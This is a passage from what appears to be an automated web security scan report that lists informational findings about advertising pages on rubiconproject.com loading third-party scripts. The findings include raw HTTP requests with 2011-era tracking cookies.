Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk2=0; ses2=12338^10&12590^5; rdk=7856/12590; rdk15=0; ses15=12338^7&12590^6

Response

15.15. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The response dynamically includes the following script from another domain:

http://uac.advertising.com/wrapper/aceUAC.js

Request

Response

15.16. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=50234679-488b-4d23-aea0-c3ab79288481&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOAjEQA79y2ppIyXqTOPwmB3QnOirE3_FWnpFsfw2w.7HoA7fD4BICjWlNYr06YsxVgjxLPB1lv3YtD.xzLieDzXKa5dm9zrT8WcqujAoKQ_j.XJdwCJuqffz.qIEagA--%26redirectURL%3D

Request

GET /a/7856/12590/22782-15.html?cb=0.03344764839857817&keyword=smh/businessinnovations_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^11&12590^9; rdk=7725/12338; rdk2=0; ses2=12338^19&12590^7; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

15.17. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The response dynamically includes the following script from another domain:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766930&l=300x250&aid=26655620&ahcid=1862304&bimpd=3ZT4qeVfW2eflo6i8tBht1ANErsXpVwuSH7n0sObSTpUlEwRZhuZ4bjitVSL3PEKAG0ttKWDZTDMsBahjtd3tL8wvAhJVp5vH1605NNaPKisUQt-lkDpGOXuXVonttiGHngq6py6H04rQhjgefP3Nx3fWMI7KhyrWqgJYhCiRbpUMYDNuG9lylmFGegZs3d4yEG8BP5dzjykSC6Ht6iJ2ZT02Ti1h452fwgpRY2wxLoyjF_nhB_W_gMlLwGpdcJ0jc-VyHDsmqPRZuYRzjE4syKkKuoUr6yeAaya3ZXMDZCx9FlG-X0121QtOdbOXWsLIJuM376NcyOPzY8jGqH6SRUs0jS9_-jXfuzQr6fBboc91ieMz2dxZVCTxS1_BULq-jvsmvErAWV3rDE5CAn1zuPqcSHXZ5esCGaTz5fv5OPKD4baNUh-M_tG5AeiOiff6yUix1UC5red8L7udmEJT_e_WusQSRWq7MSF1qPrE1vqAK8cHzvevpG_BntZvJrKQNANcX7Fy6CCGwL6zhvlrnHphu-UzfDCXoT5Q4N9hQAKBn1Qr-tiIVwRdaXoMXgVvfBz5xDsVEqchMpjM7fNhT-geEL0DD97bMApSU7DtEBTRfjwZrU1fReHz9W8rOsmbNGFVWiPguIu6HCsrR1QrL3wc-cQ7FRKnITKYzO3zYUIira0837MbrH9d2aRavVTHRHXzEnsfg0l8JPGS068nS84csyl6jUKywbUyFhc7AKjsZQyAQ6kVAwWSib4A4xD-KISKV43YFluqLKM9CWfBcXnC3HM0YzExa44peHG5dgwoaE3NXvnNuHwlpipNFPejP4V5j_ljOA1UvBfaz7YhH0lpriMl-1v60tkD4B8fShZA5xP-LKOGfmI9Q4im5wVtElbns2ZawQBFvd3CNlCyJsDWOZp1nMAuRgONm9vyA7avyVVNN0qUmepM37kGvs1&acp=A78467F56BDD69A9&rtbacid=15495ada94ce2156d70faee2b515d5baad9080fe

Request

GET /a/7856/12590/22782-15.html?cb=0.3839801487047225&keyword=smh/news_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi2=3165011.js^1^1315404895^1315404895&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses2=12338^6&12590^2; rdk=7725/12338; rdk15=0; ses15=12338^5&12590^3

Response

15.18. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=fa8130bd-b723-4a80-b003-dfcb439ce917&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDkOhTAQQ6.CpibSTJxlwm0IS4XoqL7.3XGo_J5k.yeALFPzWDBPgkhxwHyYUeRc3aB9D71GhLS6hq6KsJ9bT2jb0azKmI5yzVE_Gz.NmZlJ4cREvJ_rIhaisZrL_wXvwxtb%26redirectURL%3D

Request

Response

15.19. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=f0ab4cc1-d8d0-45fb-a7e4-8bcf2113e1c6&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOwCAMA79SZS4SIQFCfwO0TKhbp6p_r5l8J9l.SYSOrVhIsm8kAWIibApjCA1fm_bO7rTTO42juZovddb6CMxycU.0pqucY_B52fopyIhULwZU4P3MCUxARjXy9wMftxvl%26redirectURL%3D

Request

GET /a/7856/12590/22782-2.html?cb=0.8627023494336754&keyword=smh/business_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses2=12338^10&12590^4; rdk=7725/12338; rdk15=0; ses15=12338^7&12590^5

Response

15.20. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=25805018&ahcid=972586&bimpd=CaJ_lM07IMXi3NigYDUAe0SBb0a6l86OthwCdfEkYcC62ZGsIJLNEOeRyRTTXZHYPHNst5RKy8WKU4-3iCkdmb8wvAhJVp5vH1605NNaPKhH3Hc40cPaTNqetb7TxZG_Hngq6py6H04rQhjgefP3Nx3fWMI7KhyrWqgJYhCiRbpUMYDNuG9lylmFGegZs3d4yEG8BP5dzjykSC6Ht6iJ2ZT02Ti1h452fwgpRY2wxLoyjF_nhB_W_gMlLwGpdcJ0IAJ3vhfefGYtBCDoFcVz7Jias8VN36K8E7qeYA6SXq3xMK_frmzMN839J9se-s8p6aPInsitVDVHi4bpOThNZWrV_7LUn7uuI0x9TMgCSJV1CDCiZyk6lqZP3FnWWvGEyOEuR2bakunP7dL9F3EVXNNzPlQ90q-kuLtlBe_29z7-fBrTpN1ppkK2S614QSg16yUix1UC5red8L7udmEJT1MAsbr_XpExqMlMu3-dM_44jldsCh__clPH9NdPHrdDIZPp8vIQlTB5zS1-20bCwHHphu-UzfDCXoT5Q4N9hQAKBn1Qr-tiIVwRdaXoMXgVvfBz5xDsVEqchMpjM7fNhdm6MqcHUT75ZJk4A7UxuywDU7s3xco0Z7iBYr7DIfApbNGFVWiPguIu6HCsrR1QrL3wc-cQ7FRKnITKYzO3zYVIta2RqrNw6iUvr83e82oB7ooG0_osUcryn5NoqEa1T45jEImZghLDuAyXItQ9HpSjsZQyAQ6kVAwWSib4A4xDhSZ0vmPD0TjGVzAPpQKKX61e2ZVGQ7LdSyxeFNkf-CGjaTiYFIBgaE-RzeyL6tTfpGM6X4y-wO-Gwhnxcy9FyX0lpriMl-1v60tkD4B8fShZA5xP-LKOGfmI9Q4im5wVDxMvrxhhFVlJNMNA9Okq02TL4uQDHjXmsQmHeaQuYzgu99F_08R1wLmmgenofLK7&acp=1AE250511320D835&rtbacid=8e23abccd4e2e9b434d7cf2acc0f7a151e7493e7

Request

GET /a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; ses2=12338^3&12590^1; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; cd=false; lm="7 Sep 2011 14:14:36 GMT"; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk=7856/12590; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025

Response

15.21. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26655621&ahcid=1862305&bimpd=qvey7M4dbcYCqAn2iG9ztyN0s9aRRFcAB46FGFRJARXDa-9_1NSluyZs9V4lcxbvB5QG7MCVk9j9840Pj41gG78wvAhJVp5vH1605NNaPKhH3Hc40cPaTNqetb7TxZG_bvlU9U7atshvMo03rXjmCyTpNA14uRb30ZB3drhT7b5A1kODxXS6UkRbafQ_vua1ON8YzvP9i1NBAzlvC2Of7Dbw6rj-zkxgkYAI4PHz3qrnRnblngZQJy2wx6j9m09DL435c4XDwTkoXZsLUx725ZWy23fsNn_X0Jk-40K2KMDFKwUaH5iO4gu4sPKu6NihyfNOMGciyyoTxTjKJqxYc6FnkRqrBo2cLNPgwHre5FHs93gaSC7FTPyIPLZP8ukgBS9Tk7NRROL2OtpwtUVEZFr7t6tkFX4P1ZTWWY9-1gYc3d8dAuX1XMQbErAQcZYT-2wLG1v0jNNGvLFwPVI463aoBUsWtsZZqH0CVvFPBCo9WQ4wWLxz2Pt3Dul33WxyvCgee3_397yfjtYKXTfjBs4LYADIz4C1UC24QYs7MN6Uwz1lVaf0RwqnshRhX3_tvfBz5xDsVEqchMpjM7fNhQtqmEr3HksrlmkNmn1jt-0EP05YAqhV5qAFyI7rIpPH4m44AHqTc8Trnv4qrQ2pxNW_m6IzsOng0XvdRcMF2unY8wZzXZwCKnnfDdEHfhOIgCchPaU_67i3SPEJWYvjs-0uT3Woquzk117HiJb6nAyHJvsAP9bFmqWc6-PMrG05VmE95kT6f-NQ_XOtIrXbJYCTwcVHvA9ZdSrJmtTmdeFw3pucVEdD-NlECFL3UA9yCHhqtsF3JDqz7AN1nNSARz3bdu7qLIRU2DxjKSbYCxc&acp=34DF183B07E82D56&rtbacid=019bde7d8543e9a90f68a4460c7be19f9e13d5ab

Request

Response

15.22. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=cba188b6-c0aa-47b1-8e31-68fe0e58fd0f&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDsOwzAMQ68SaK4ByfKH6W3sxJ6CbJ2K3D30xPcAkn9xl..2Ixb_bOKRAndDohlFjt4M6CUc2lpItVvAcAsFc.jImKdOWdNVrjlqXbZ.dmZmJnUQE_H.XRexEI3VbM8LEL4bxA--%26redirectURL%3D

Request

GET /a/7856/12590/22782-2.html?cb=0.3859964762814343&keyword=smh/business_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^11&12590^9; ses2=12338^18&12590^7

Response

15.23. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The response dynamically includes the following script from another domain:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=f8d7f130-eb44-4d57-a129-06e19ec49ade&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlOpadI24TeFlgmxMSH.jjv5TrL9kghti1sqsi4kCWIibApjCJ3W68kSw9hVg_ZcQ.PkIZbBPg711gfN6SzXnGKdNn8cmZEaxYAKvJ_rAhYgo5r5.wHzDxtt%26redirectURL%3D

Request

GET /a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^5&12590^4; rdk=7725/12338; ses2=12338^7&12590^2; csi2=3165011.js^2^1315404895^1315404918&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

15.24. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22893-15.html

Issue detail

The response dynamically includes the following script from another domain:

